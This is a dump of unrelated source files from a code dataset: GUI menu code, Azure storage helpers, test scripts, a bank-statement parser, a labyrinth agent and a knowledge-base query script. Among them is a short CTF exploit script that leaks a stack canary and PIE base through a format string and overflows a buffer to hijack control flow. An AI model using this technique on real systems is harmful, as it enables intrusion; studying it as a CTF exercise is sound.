m.Append(wxID_COPY, '&Copy \tCtrl+C', 'Copy the selection')
m.Append(wxID_PASTE, '&Paste \tCtrl+V', 'Paste')
m.AppendSeparator()
m.Append(wxID_CLEAR, 'Cle&ar', 'Delete the selection')
m.Append(wxID_SELECTALL, 'Select A&ll', 'Select all text')
m = self.autocompMenu = wxMenu()
m.Append(ID_AUTOCOMP_SHOW, 'Show Auto Completion', \
'Show auto completion during dot syntax', 1)
m.Append(ID_AUTOCOMP_INCLUDE_MAGIC, 'Include Magic Attributes', \
'Include attributes visible to __getattr__ and __setattr__', 1)
        m.Append(ID_AUTOCOMP_INCLUDE_SINGLE, 'Include Single Underscores', \
                 'Include attributes prefixed by a single underscore', 1)
        m.Append(ID_AUTOCOMP_INCLUDE_DOUBLE, 'Include Double Underscores', \
                 'Include attributes prefixed by a double underscore', 1)
m = self.calltipsMenu = wxMenu()
m.Append(ID_CALLTIPS_SHOW, 'Show Call Tips', \
'Show call tips with argument specifications', 1)
m = self.optionsMenu = wxMenu()
m.AppendMenu(ID_AUTOCOMP, '&Auto Completion', self.autocompMenu, \
'Auto Completion Options')
m.AppendMenu(ID_CALLTIPS, '&Call Tips', self.calltipsMenu, \
'Call Tip Options')
if hasattr( self, 'crust' ):
fm = self.fillingMenu = wxMenu()
fm.Append(ID_FILLING_AUTO_UPDATE, 'Automatic Update',
'Automatically update tree view after each command', 1)
fm.Append(ID_FILLING_SHOW_METHODS, 'Show Methods',
'Show methods and functions in the tree view', 1)
fm.Append(ID_FILLING_SHOW_CLASS, 'Show __class__',
'Show __class__ entries in the tree view', 1)
fm.Append(ID_FILLING_SHOW_DICT, 'Show __dict__',
'Show __dict__ entries in the tree view', 1)
fm.Append(ID_FILLING_SHOW_DOC, 'Show __doc__',
'Show __doc__ entries in the tree view', 1)
fm.Append(ID_FILLING_SHOW_MODULE, 'Show __module__',
'Show __module__ entries in the tree view', 1)
m.AppendMenu(ID_FILLING, '&Filling', fm, 'Filling Options')
m = self.helpMenu = wxMenu()
m.AppendSeparator()
m.Append(wxID_ABOUT, '&About...', 'About PyCrust')
b = self.menuBar = wxMenuBar()
b.Append(self.fileMenu, '&File')
b.Append(self.editMenu, '&Edit')
b.Append(self.optionsMenu, '&Options')
b.Append(self.helpMenu, '&Help')
self.SetMenuBar(b)
EVT_MENU(self, wxID_EXIT, self.OnExit)
EVT_MENU(self, wxID_UNDO, self.OnUndo)
EVT_MENU(self, wxID_REDO, self.OnRedo)
EVT_MENU(self, wxID_CUT, self.OnCut)
EVT_MENU(self, wxID_COPY, self.OnCopy)
EVT_MENU(self, wxID_PASTE, self.OnPaste)
EVT_MENU(self, wxID_CLEAR, self.OnClear)
EVT_MENU(self, wxID_SELECTALL, self.OnSelectAll)
EVT_MENU(self, wxID_ABOUT, self.OnAbout)
EVT_MENU(self, ID_AUTOCOMP_SHOW, \
self.OnAutoCompleteShow)
EVT_MENU(self, ID_AUTOCOMP_INCLUDE_MAGIC, \
self.OnAutoCompleteIncludeMagic)
EVT_MENU(self, ID_AUTOCOMP_INCLUDE_SINGLE, \
self.OnAutoCompleteIncludeSingle)
EVT_MENU(self, ID_AUTOCOMP_INCLUDE_DOUBLE, \
self.OnAutoCompleteIncludeDouble)
EVT_MENU(self, ID_CALLTIPS_SHOW, \
self.OnCallTipsShow)
EVT_UPDATE_UI(self, wxID_UNDO, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_REDO, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_CUT, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_COPY, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_PASTE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, wxID_CLEAR, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_SHOW, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_INCLUDE_MAGIC, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_INCLUDE_SINGLE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_AUTOCOMP_INCLUDE_DOUBLE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_CALLTIPS_SHOW, self.OnUpdateMenu)
if hasattr( self, 'crust' ):
EVT_MENU(self, ID_FILLING_AUTO_UPDATE, self.OnFillingAutoUpdate)
EVT_MENU(self, ID_FILLING_SHOW_METHODS, self.OnFillingShowMethods)
EVT_MENU(self, ID_FILLING_SHOW_CLASS, self.OnFillingShowClass)
EVT_MENU(self, ID_FILLING_SHOW_DICT, self.OnFillingShowDict)
EVT_MENU(self, ID_FILLING_SHOW_DOC, self.OnFillingShowDoc)
EVT_MENU(self, ID_FILLING_SHOW_MODULE, self.OnFillingShowModule)
EVT_UPDATE_UI(self, ID_FILLING_AUTO_UPDATE, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_METHODS, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_CLASS, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_DICT, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_DOC, self.OnUpdateMenu)
EVT_UPDATE_UI(self, ID_FILLING_SHOW_MODULE, self.OnUpdateMenu)
def OnExit(self, event):
self.Close(True)
def OnUndo(self, event):
self.shell.Undo()
def OnRedo(self, event):
self.shell.Redo()
def OnCut(self, event):
self.shell.Cut()
def OnCopy(self, event):
self.shell.Copy()
def OnPaste(self, event):
self.shell.Paste()
def OnClear(self, event):
self.shell.Clear()
def OnSelectAll(self, event):
self.shell.SelectAll()
def OnAbout(self, event):
"""Display an About PyCrust window."""
import sys
title = 'About PyCrust'
text = 'PyCrust %s\n\n' % VERSION + \
'Yet another Python shell, only flakier.\n\n' + \
'Half-baked by <NAME>,\n' + \
'the other half is still in the oven.\n\n' + \
'Shell Revision: %s\n' % self.shell.revision + \
'Interpreter Revision: %s\n\n' % self.shell.interp.revision + \
'Python Version: %s\n' % sys.version.split()[0] + \
'wxPython Version: %s\n' % wx.__version__ + \
'Platform: %s\n' % sys.platform
dialog = wxMessageDialog(self, text, title, wxOK | wxICON_INFORMATION)
dialog.ShowModal()
dialog.Destroy()
def OnAutoCompleteShow(self, event):
self.shell.autoComplete = event.IsChecked()
def OnAutoCompleteIncludeMagic(self, event):
self.shell.autoCompleteIncludeMagic = event.IsChecked()
def OnAutoCompleteIncludeSingle(self, event):
self.shell.autoCompleteIncludeSingle = event.IsChecked()
def OnAutoCompleteIncludeDouble(self, event):
self.shell.autoCompleteIncludeDouble = event.IsChecked()
def OnCallTipsShow(self, event):
self.shell.autoCallTip = event.IsChecked()
def OnFillingAutoUpdate(self, event):
tree = self.crust.filling.fillingTree
tree.autoUpdate = event.IsChecked()
tree.if_autoUpdate()
def OnFillingShowMethods(self, event):
tree = self.crust.filling.fillingTree
tree.showMethods = event.IsChecked()
tree.update()
def OnFillingShowClass(self, event):
tree = self.crust.filling.fillingTree
tree.showClass = event.IsChecked()
tree.update()
def OnFillingShowDict(self, event):
tree = self.crust.filling.fillingTree
tree.showDict = event.IsChecked()
tree.update()
def OnFillingShowDoc(self, event):
tree = self.crust.filling.fillingTree
tree.showDoc = event.IsChecked()
tree.update()
def OnFillingShowModule(self, event):
tree = self.crust.filling.fillingTree
tree.showModule = event.IsChecked()
tree.update()
def OnUpdateMenu(self, event):
"""Update menu items based on current status."""
id = event.GetId()
if id == wxID_UNDO:
event.Enable(self.shell.CanUndo())
elif id == wxID_REDO:
event.Enable(self.shell.CanRedo())
elif id == wxID_CUT:
event.Enable(self.shell.CanCut())
elif id == wxID_COPY:
event.Enable(self.shell.CanCopy())
elif id == wxID_PASTE:
event.Enable(self.shell.CanPaste())
elif id == wxID_CLEAR:
event.Enable(self.shell.CanCut())
elif id == ID_AUTOCOMP_SHOW:
event.Check(self.shell.autoComplete)
elif id == ID_AUTOCOMP_INCLUDE_MAGIC:
event.Check(self.shell.autoCompleteIncludeMagic)
elif id == ID_AUTOCOMP_INCLUDE_SINGLE:
event.Check(self.shell.autoCompleteIncludeSingle)
elif id == ID_AUTOCOMP_INCLUDE_DOUBLE:
event.Check(self.shell.autoCompleteIncludeDouble)
elif id == ID_CALLTIPS_SHOW:
event.Check(self.shell.autoCallTip)
elif id == ID_FILLING_AUTO_UPDATE:
event.Check(self.crust.filling.fillingTree.autoUpdate)
elif id == ID_FILLING_SHOW_METHODS:
event.Check(self.crust.filling.fillingTree.showMethods)
elif id == ID_FILLING_SHOW_CLASS:
event.Check(self.crust.filling.fillingTree.showClass)
elif id == ID_FILLING_SHOW_DICT:
event.Check(self.crust.filling.fillingTree.showDict)
elif id == ID_FILLING_SHOW_DOC:
event.Check(self.crust.filling.fillingTree.showDoc)
elif id == ID_FILLING_SHOW_MODULE:
event.Check(self.crust.filling.fillingTree.showModule)
| 1.703125 | 2 |
redteamvillage2021/pie/exploit.py | nhtri2003gmail/ctf-write-ups | 101 | 12798034 | <gh_stars>100-1000
#!/usr/bin/env python3
from pwn import *
binary = context.binary = ELF('./pie')
if args.REMOTE:
p = remote('pwnremote.threatsims.com', 9002)
else:
p = process(binary.path)
# Leak two stack values with one format string. The width 10 makes each value
# print as exactly 10 characters ('0x' + 8 hex digits on 32-bit), so the two
# leaks can be split with fixed-size reads below.
p.sendlineafter('?\n','%11$10p%15$10p')
p.recvuntil('command: ')
canary = int(p.recv(10),16)  # 11th stack word: the stack canary
log.info('canary: ' + hex(canary))
main = int(p.recv(10),16) - 95  # 15th word: a code address 95 bytes into main
log.info('main: ' + hex(main))
binary.address = main - binary.sym.main  # defeat PIE: recover the load base
log.info('binary.address: ' + hex(binary.address))
# Overflow the buffer while keeping the leaked canary intact, then point the
# saved return address at helperfunc (offsets as in the original script).
payload = b''
payload += (0x21 - 0x10) * b'A'  # padding up to the canary
payload += p32(canary)  # preserve the canary so the stack check passes
payload += (0x21 - len(payload)) * b'B'  # padding up to the return address
payload += p32(binary.sym.helperfunc)
p.sendlineafter('?',payload)
p.interactive()
| 1.859375 | 2 |
src/data/azure_storage_utils.py | lukk60/RETrends | 0 | 12798035 | # Utility functions to access azure data storage
import json

from azure.storage.blob import BlockBlobService
def load_text_file(containerName, blobName, accountName, accountKey):
'''
load the file specified from azure block blob storage. if the file is not
found return an empty dictionary
Parameters
----------
containerName: str
container in storage account to open
blobName: str
name of blob in container to open
accountName: str
name of storage account
    accountKey: str
access key for storage account
Returns
-------
dictionary
'''
    # Create BlockBlobService
block_blob_service = BlockBlobService(
account_name=accountName, account_key=accountKey
)
# try loading data from blob store. if blob is not found return empty dict
try:
res = block_blob_service.get_blob_to_text(containerName, blobName)
blobData = json.loads(res.content)
    except Exception:
blobData = {}
return blobData
def save_text_file(data, containerName, blobName, accountName, accountKey):
'''
save a textfile to azure block blob storage.
Parameters
----------
data: str
(text)data to upload
containerName: str
container in storage account
blobName: str
name of blob in container
accountName: str
name of storage account
    accountKey: str
access key for storage account
Returns
-------
'''
    # Create BlockBlobService
block_blob_service = BlockBlobService(
account_name=accountName, account_key=accountKey
)
block_blob_service.create_blob_from_text(containerName, blobName, data)
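

# Hypothetical usage sketch (not part of the original module): round-trips a
# small JSON payload through blob storage. Container, blob, account name and
# key below are placeholders -- substitute real values before running.
if __name__ == '__main__':
    demo_payload = json.dumps({'hello': 'world'})
    save_text_file(demo_payload, 'my-container', 'demo.json',
                   'my-account-name', 'my-account-key')
    roundtrip = load_text_file('my-container', 'demo.json',
                               'my-account-name', 'my-account-key')
    print(roundtrip)  # -> {'hello': 'world'}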
| 3.203125 | 3 |
run_tests.py | wsmith323/constantmodel | 2 | 12798036 | <filename>run_tests.py
#!/usr/bin/env python
import os
import subprocess
import sys
def install_dependencies():
print("\nInstalling test dependencies...\n")
try:
subprocess.check_output("pip install -r test_requirements.txt", shell=True,
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as exc:
print("ERROR: Test dependency installation failed.\n{}\n".format(exc.output.decode()))
return False
else:
print("Test dependency installation successful.\n")
return True
def run_django_tests():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "django_test_app.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv + ['test'])
if __name__ == '__main__':
if install_dependencies():
run_django_tests()
| 2.0625 | 2 |
booksite/booksite/book/schema.py | LoyalWilliams/bookspider | 39 | 12798037 | <reponame>LoyalWilliams/bookspider<filename>booksite/booksite/book/schema.py
# -*- coding: utf-8 -*-
from graphene import relay, ObjectType, AbstractType
from graphene_django import DjangoObjectType
from graphene_django.filter import DjangoFilterConnectionField
from .models import Book, BookPage
class BookPageNode(DjangoObjectType):
class Meta:
model = BookPage
filter_fields = {
'book_number': ['exact'],
'page_number': ['exact'],
}
interfaces = (relay.Node, )
class BookNode(DjangoObjectType):
class Meta:
model = Book
filter_fields = {
'title': ['exact', 'icontains', 'istartswith'],
'author': ['exact', 'icontains', 'istartswith'],
'category': ['exact'],
}
interfaces = (relay.Node, )
class Query(AbstractType):
book = relay.Node.Field(BookNode)
book_page = relay.Node.Field(BookPageNode)
all_books = DjangoFilterConnectionField(BookNode)
all_pages = DjangoFilterConnectionField(BookPageNode)
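
# Illustrative relay-style query against this schema. graphene-django exposes
# the filter_fields above as camel-cased arguments (e.g. 'title': ['icontains']
# becomes title_Icontains on allBooks); the search string here is made up:
#
#   query {
#     allBooks(title_Icontains: "python") {
#       edges { node { title author } }
#     }
#   }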
| 2.15625 | 2 |
_unittests/ut_special/test_tsp_bresenham.py | Jerome-maker/ensae_teaching_cs | 73 | 12798038 | <reponame>Jerome-maker/ensae_teaching_cs<gh_stars>10-100
"""
@brief test log(time=10s)
"""
import unittest
import random
from ensae_teaching_cs.special.tsp_bresenham import draw_line, draw_ellipse
class TestTspBresenham(unittest.TestCase):
def test_bresenham(self):
x, y = 500, 500
for n in range(0, 10):
x1 = random.randint(0, x - 1)
y1 = random.randint(0, y - 1)
x2 = random.randint(0, x - 1)
y2 = random.randint(0, y - 1)
ligne1 = draw_line(x1, y1, x2, y2)
ligne2 = draw_line(x2, y2, x1, y1)
ligne2.reverse()
self.assertEqual(len(ligne1), len(ligne2))
draw_line(x2, y1, x1, y2)
draw_line(x1, y2, x2, y1)
def test_bresenham_ellipses(self):
x, y = 500, 500
for n in range(0, 10):
x1 = random.randint(0, x - 1)
y1 = random.randint(0, y - 1)
xa = random.randint(50, 100)
xb = random.randint(50, 100)
draw_ellipse(x1, y1, xa, xb)
if __name__ == "__main__":
unittest.main()
| 2.875 | 3 |
architecture/editor_manager.py | hkdeman/termineditor | 0 | 12798039 | from curses.textpad import rectangle
import curses
ORIGIN_Y, ORIGIN_X = 5,2
class EditorManager:
def __init__(self,std_scr):
self.std_scr = std_scr
self.height, self.width = self.std_scr.getmaxyx()
self.origin_y, self.origin_x = 5, 2
self.canvas_height, self.canvas_width = self.height//4-1, self.width//4-4
self.all_editors = {}
self.is_global_state = False
self.navigator = None
curses.init_pair(2, curses.COLOR_GREEN, curses.COLOR_BLACK)
def left(self):
pass
def right(self):
pass
def up(self):
pass
def down(self):
pass
def run(self):
pass
def clear_content(self):
for i in range(self.origin_y+2,self.canvas_height):
self.std_scr.addstr(i, self.origin_x," "*(self.canvas_width-2))
def show_title(self):
self.std_scr.addstr(self.origin_y, self.origin_x+1, "Open Editors")
self.std_scr.addstr(self.origin_y, self.canvas_width-3, "▼")
rectangle(self.std_scr, self.origin_y - 1, self.origin_x - 1, self.origin_y + 1, self.width // 4 - 4)
def show_content(self):
self.clear_content()
self.all_editors = {}
index, editors = self.navigator.context["Manager"].get_all_editor_names()
for i, editor in enumerate(editors):
self.all_editors[i] = editor
rectangle(self.std_scr, self.origin_y+1,self.origin_x-1,self.canvas_height, self.canvas_width)
for i, editor in self.all_editors.items():
if i == index:
self.std_scr.addstr(self.origin_y + i + 2, self.origin_x + 1, editor, curses.color_pair(2))
else:
self.std_scr.addstr(self.origin_y+i+2, self.origin_x+1, editor)
self.std_scr.refresh()
def display(self):
self.show_title()
self.show_content()
def update_global_status(self,status):
self.is_global_state = status
def set_navigator(self, navigator):
self.navigator = navigator | 2.703125 | 3 |
pybpodapi/com/messaging/debug.py | ckarageorgkaneen/pybpod-api | 1 | 12798040 | # !/usr/bin/python3
# -*- coding: utf-8 -*-
from pybpodapi.com.messaging.base_message import BaseMessage
class DebugMessage(BaseMessage):
""" Information line for things like experiment name , task name, board id, etc. """
MESSAGE_TYPE_ALIAS = "debug"
MESSAGE_COLOR = (200, 200, 200)
| 1.9375 | 2 |
metaphor/tableau/__main__.py | MetaphorData/connectors | 5 | 12798041 | from metaphor.common.cli import cli_main
from .extractor import TableauExtractor
if __name__ == "__main__":
cli_main("Tableau metadata extractor", TableauExtractor)
| 1.140625 | 1 |
generate/generate/tests/__init__.py | flamencist/browser-extensions | 102 | 12798042 | def dummy_config():
return {
'uuid': 'TEST-UUID',
'main': {
'server': 'https://test.forge.io/api/'
}
} | 1.4375 | 1 |
opentutorials_python2/opentutorials_python2/20_Object_and_Module/1_Object_and_Module.py | dongrami0425/Python_OpenCV-Study | 0 | 12798043 | <filename>opentutorials_python2/opentutorials_python2/20_Object_and_Module/1_Object_and_Module.py
# < Objects and Modules >
import lib  # importing a module: import module_name
obj = lib.A()  # instantiate class A from the lib module
print(obj.a())
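
# For reference, a minimal lib.py that would make this example work (assumed
# here -- the actual module ships alongside the tutorial):
#
#   class A:
#       def a(self):
#           return 'a'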
| 1.914063 | 2 |
mt940_v2.py | bvermeulen/mt940---simple | 0 | 12798044 | #!/usr/bin/env python
import re
import sys
import decimal
from mt940m_v2 import ParseMT940
D = decimal.Decimal
# read and concatenate entire MT940 contents and add '-ABN' to make sure the last record is captured
if len(sys.argv)== 2:
argf = sys.argv[1]
else:
print('please provide a valid MT940 file')
exit()
text = open(argf).read().splitlines()
text = ''.join(text) +'-ABN'
payee = ''
memo = ''
total_amount = D('0')
bank_account = ''
fn = ''
# record: pattern to determine a MT940 record group, note more than one transaction
# is possible within a record
record_pat = re.compile(r'(?P<record>:\d\d.??:.*?(?=-ABN))')
# field_pat: pattern to seperate the fields in the MT940 file :num :field
field_pat = re.compile(r':(?P<num>\d\d).??:(?P<field>.*?(?=:\d\d.??:))')
# val61_pat: pattern to seperate the values in field 61
#:valuta (date) :date (transaction date and used for date) :sign :amount :code :reference
val61_pat = re.compile(r'(?P<valuta>\d{6})(?P<date>\d{4})(?P<sign>\D)'
r'(?P<amount>\d+[,.]\d*)(?P<code>\w{4})(?P<reference>\w+$)')
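# Worked example (made-up transaction) of how val61_pat splits a field 61 value:
#   '2001020102D123,45NTRFNONREF' ->
#   valuta='200102', date='0102', sign='D', amount='123,45',
#   code='NTRF', reference='NONREF'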
for match in re.finditer(record_pat, text):
# add token ':99:' to the end of the record to make sure the last field is also captured
record = match.group('record') +':99:'
# parse the string in a field number 'num' and its corresponding 'field'
for match in re.finditer(field_pat,record):
num = match.group('num')
field = match.group('field')
# in case field number is equal to '25' check if it is a new bank_account. If new make new qif file using
# the name of the bank account found in field '25'. Field 25 is assumed to be before field 61.
if num == '25':
# close the qif file if this is not the first instance
if field != bank_account and bank_account != '':
qif_file.close()
end_balance = start_balance + total_amount
print ('{}: start balance: {:.2f} / transfers: {:.2f} / end balance: {:.2f}' \
.format(fn, start_balance, total_amount, end_balance))
total_amount = D('0')
fn = ''
# open a new qif file if a new bank account is encountered
if field != bank_account:
bank_account = field
new_bank_flag = True
fn = argf.rsplit('.',1)[0] # make the file name the same as the 1st argument + some changes
fn = fn + '_' + bank_account +'.qif'
qif_file = open(fn,'w')
qif_file.write('!Type:Bank\n')
#find the start_balance for a new bank account in field 60
if num == '60' and new_bank_flag:
m=re.search(r'(\D)\d{6}.*?(?=[\d])(.*$)',field)
start_balance=D(ParseMT940.conv_amount_str(m.group(1),m.group(2)))
new_bank_flag = False
# in case field number is '61' handle the transaction using the information in field 61 and subsequent 86
if num == '61':
f61 = re.match(val61_pat, field)
f61_dict = f61.groupdict()
# in case field number is '86' handle to payee and memo and write the transaction to QIF
if num == '86':
date = ParseMT940.transaction_date_conversion(f61_dict['valuta'], f61_dict['date'])
amount = ParseMT940.conv_amount_str(f61_dict['sign'], f61_dict['amount'])
payee, memo = ParseMT940.code86(field, bank_account, date, amount)
total_amount += D(amount)
ParseMT940.write_qif_record (qif_file, date, amount, payee, memo)
# on finishing the program close the last qif_file
if fn !='':
qif_file.close()
end_balance = start_balance + total_amount
print ('{}: start balance: {:.2f} / transfers: {:.2f} / end balance: {:.2f}'.format(fn, start_balance, total_amount, end_balance))
else:
print('this is not a valid MT940 file')
| 2.96875 | 3 |
PokeBot/Load.py | danrneal/PokeBot | 0 | 12798045 | <filename>PokeBot/Load.py
import logging
import json
import sys
from collections import OrderedDict
from .Utilities.GenUtils import get_path
log = logging.getLogger('LoadConfig')
def parse_rules_file(manager, filename):
if str(filename).lower() == 'none':
return
filepath = get_path(filename)
rules = OrderedDict()
try:
log.info("Loading Rules from file at {}".format(filepath))
with open(filepath, 'r') as f:
rules = json.load(f, object_pairs_hook=OrderedDict)
if type(rules) is not OrderedDict:
log.critical(
"Rules files must be a JSON object: { \"monsters\":[...],... }"
)
raise ValueError("Rules file did not contain a dict.")
except ValueError as e:
log.error("Encountered error while loading Rules: {}: {}".format(
type(e).__name__, e))
log.error(
"PokeAlarm has encountered a 'ValueError' while loading the " +
"Rules file. This typically means the file isn't in the " +
"correct json format. Try loading the file contents into a " +
"json validator."
)
sys.exit(1)
try:
load_rules_section(manager.add_monster_rule, rules.pop('monsters', {}))
load_rules_section(manager.add_egg_rule, rules.pop('eggs', {}))
load_rules_section(manager.add_raid_rule, rules.pop('raids', {}))
for key in rules:
raise ValueError((
"Unknown Event type '{}'. Rules must be defined under the " +
"correct event type. See example in rules.json.example."
).format(key))
except Exception as e:
log.error(
"Encountered error while parsing Rules. This is because of a " +
"mistake in your Rules file."
)
log.error("{}: {}".format(type(e).__name__, e))
sys.exit(1)
def load_rules_section(set_rule, rules):
for name, settings in rules.items():
if 'filters' not in settings:
raise ValueError("{} rule is missing a `filters` section.".format(
name))
if 'alarms' not in settings:
raise ValueError("{} rule is missing an `alarms` section.".format(
name))
filters = settings.pop('filters')
alarms = settings.pop('alarms')
set_rule(name, filters, alarms)
if len(settings) > 0:
raise ValueError("Rule {} has unknown parameters: {}".format(
name, settings))
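

# Illustrative shape of a rules file accepted by parse_rules_file. Rule,
# filter and alarm names below are made up; see rules.json.example for the
# real format:
#
# {
#     "monsters": {
#         "rare-spawns": {
#             "filters": ["rare-filter"],
#             "alarms": ["my-discord-alarm"]
#         }
#     },
#     "eggs": {},
#     "raids": {}
# }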
| 2.6875 | 3 |
Labyrint/Agent.py | flikkes/intelligente_agenten | 0 | 12798046 | import sys
import os
import Labyrinth
import time
import threading
class Agent:
num = 0
x = 0
y = 0
labyrinth = None
callback = None
def __init__(self, x, y, labyrinth, callback):
self.num = time.time()*1000
self.x = x
self.y = y
self.labyrinth = labyrinth
self.callback = callback
print(str(self.num)+': Created new agent. Exploring...')
t = threading.Thread(target=self.explore)
t.start()
def explore(self):
self.callback()
if self.labyrinth.finished or self.labyrinth.isVisited(self.x, self.y):
sys.exit()
walkableSpots = []
if (self.labyrinth.isFinish(self.x, self.y)):
print(str(self.num)+': Agent found the exit at x: '+str(self.x)+', y: '+str(self.y))
self.labyrinth.finished = True
sys.exit()
self.labyrinth.visit(self.x, self.y)
print('{}: Visiting {} {}'.format(str(self.num), self.x, self.y))
if (self.labyrinth.isWalkable(self.x-1, self.y)):
walkableSpots.append({'x': self.x-1, 'y': self.y})
if (self.labyrinth.isWalkable(self.x, self.y-1)):
walkableSpots.append({'x': self.x, 'y': self.y-1})
if (self.labyrinth.isWalkable(self.x+1, self.y)):
walkableSpots.append({'x': self.x+1, 'y': self.y})
if (self.labyrinth.isWalkable(self.x, self.y+1)):
walkableSpots.append({'x': self.x, 'y': self.y+1})
if (len(walkableSpots)==1):
self.x = walkableSpots[0]['x']
self.y = walkableSpots[0]['y']
t = threading.Thread(target=self.explore)
t.start()
if (len(walkableSpots)>1):
            # Fork: spawn a new agent for every branch except the first;
            # this agent continues down the first branch itself below.
            for spot in walkableSpots[1:]:
                Agent(spot['x'], spot['y'], self.labyrinth, self.callback)
self.x = walkableSpots[0]['x']
self.y = walkableSpots[0]['y']
t = threading.Thread(target=self.explore)
t.start()
if (len(walkableSpots) == 0):
print(str(self.num)+': Dead end reached, dying...')
sys.exit()
| 3.421875 | 3 |
adaptive_subgraph_collection/find_chains_in_full_KB.py | rajarshd/CBR-SUBG | 7 | 12798047 | <filename>adaptive_subgraph_collection/find_chains_in_full_KB.py<gh_stars>1-10
import os
from collections import defaultdict
from tqdm import tqdm
import pickle
from numpy.random import default_rng
import numpy as np
import argparse
import wandb
rng = default_rng()
from adaptive_subgraph_collection.adaptive_utils import get_query_entities_and_answers, \
get_query_entities_and_answers_cwq, execute_kb_query_for_hops, get_query_entities_and_answers_freebaseqa, \
get_query_entities_and_answers_metaqa, read_metaqa_kb, find_paths
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="Collect subgraphs around entities using CBR")
parser.add_argument("--train_file", type=str,
default='/mnt/nfs/scratch1/rajarshi/cbr-weak-supervision/data_with_mentions/webqsp_data_with_mentions/train.json')
parser.add_argument("--dataset_name", type=str, default='webqsp')
parser.add_argument("--output_dir", type=str,
default='/mnt/nfs/scratch1/rajarshi/cbr-weak-supervision/subgraphs/webqsp_gold_entities')
parser.add_argument("--use_gold_entities", action='store_true')
parser.add_argument("--metaqa_kb_file", type=str, default="/mnt/nfs/scratch1/rajarshi/cbr-weak-supervision/MetaQA-synthetic/3-hop/kb.txt")
parser.add_argument("--job_id", type=int, default=0)
parser.add_argument("--total_jobs", type=int, default=1)
parser.add_argument("--use_wandb", type=int, default=1)
args = parser.parse_args()
args.use_wandb = (args.use_wandb == 1)
if args.use_wandb:
wandb.init("adaptive-subgraph-collection")
if args.dataset_name.lower() == 'webqsp':
qid2qents, qid2answers, qid2gold_chains, qid2q_str = get_query_entities_and_answers(args.train_file,
return_gold_entities=args.use_gold_entities)
elif args.dataset_name.lower() == 'cwq':
qid2qents, qid2answers, qid2gold_spqls, qid2q_str = get_query_entities_and_answers_cwq(args.train_file,
return_gold_entities=args.use_gold_entities)
elif args.dataset_name.lower() == 'freebaseqa':
qid2qents, qid2answers, qid2gold_spqls, qid2q_str = get_query_entities_and_answers_freebaseqa(args.train_file)
elif args.dataset_name.lower() == 'metaqa':
qid2qents, qid2answers, qid2gold_spqls, qid2q_str = get_query_entities_and_answers_metaqa(args.train_file,
return_gold_entities=args.use_gold_entities)
if args.dataset_name.lower() == 'metaqa': # metaqa has its own KB and not full Freebase, hence do not need SPARQL
# read metaqa KB
# find 1, 2, 3 hop paths between question entities and answers
all_subgraphs = defaultdict(list)
e1_map = read_metaqa_kb(args.metaqa_kb_file)
qid2qents = [(qid, q_ents) for (qid, q_ents) in sorted(qid2qents.items(), key=lambda item: item[0])]
job_size = len(qid2qents) / args.total_jobs
st = args.job_id * job_size
en = (1 + args.job_id) * job_size
print("St: {}, En: {}".format(st, en))
empty_ctr = 0
all_len = []
for ctr, (qid, q_ents) in tqdm(enumerate(qid2qents)):
if st <= ctr < en:
ans_ents = qid2answers[qid]
len_q = 0
for q_ent in q_ents:
for ans_ent in ans_ents:
paths = find_paths(e1_map, q_ent, ans_ent)
all_subgraphs[qid].append({'st': q_ent, 'en': ans_ent, 'chains': paths})
len_q += len(paths)
if len_q == 0:
empty_ctr += 1
all_len.append(len_q)
print("Empty_ctr: {} out of {} queries".format(empty_ctr, (en - st)))
out_file = os.path.join(args.output_dir, "{}_train_chains_{}.pkl".format(args.dataset_name.lower(), str(args.job_id)))
print("Writing file at {}".format(out_file))
with open(out_file, "wb") as fout:
pickle.dump(all_subgraphs, fout)
else:
all_subgraphs = defaultdict(list)
all_len = []
for ctr, (qid, q_ents) in tqdm(enumerate(qid2qents.items())):
ans_ents = qid2answers[qid]
for q_ent in q_ents:
for ans_ent in ans_ents:
spql_2_hop = "select distinct ?r1 ?r2 where { " + "ns:" + q_ent + " ?r1 ?e1 . ?e1 ?r2 ns:" + ans_ent + ". }"
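                    # e.g. with q_ent='m.0abc12' and ans_ent='m.0xyz34'
                    # (made-up MIDs) this builds:
                    #   select distinct ?r1 ?r2 where { ns:m.0abc12 ?r1 ?e1 . ?e1 ?r2 ns:m.0xyz34. }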
ret = execute_kb_query_for_hops(spql_2_hop, hop=2)
is_exception = ret[1]
if not is_exception:
all_subgraphs[qid].append({'st': q_ent, 'en': ans_ent, 'chains': ret[0]})
all_len.append(len(ret[0]))
else:
print(spql_2_hop)
spql_1_hop = "select distinct ?r1 where { " + "ns:" + q_ent + " ?r1 ns:" + ans_ent + ". }"
ret = execute_kb_query_for_hops(spql_1_hop, hop=1)
if not is_exception:
all_subgraphs[qid].append({'st': q_ent, 'en': ans_ent, 'chains': ret[0]})
all_len.append(len(ret[0]))
else:
print(spql_1_hop)
# there are some qids for which the (above) query didnt execute because
# the entities are string literals and the queries above dont work
# To handle them, issue a special query that look for those strings in the
# immediate neighborhood. Unfortunately we can only look in the one-hop neighborhood.
# Doing more that takes way too much per query. Worth asking some SPARQL expert, how
# to handle such cases.
print("Number of queries: {}".format(len(all_subgraphs)))
empty_qids = set()
for qid, _ in qid2qents.items():
if qid not in all_subgraphs:
empty_qids.add(qid)
for empty_qid in tqdm(empty_qids):
q_ents = qid2qents[empty_qid]
answers = qid2answers[empty_qid]
for q_ent in q_ents:
for ans_ent in answers:
spql_1_hop_literal = "select distinct ?r1 where { " + "ns:" + q_ent + " ?r1 ?e1. FILTER(STR(?e1) = '" + ans_ent + "') }"
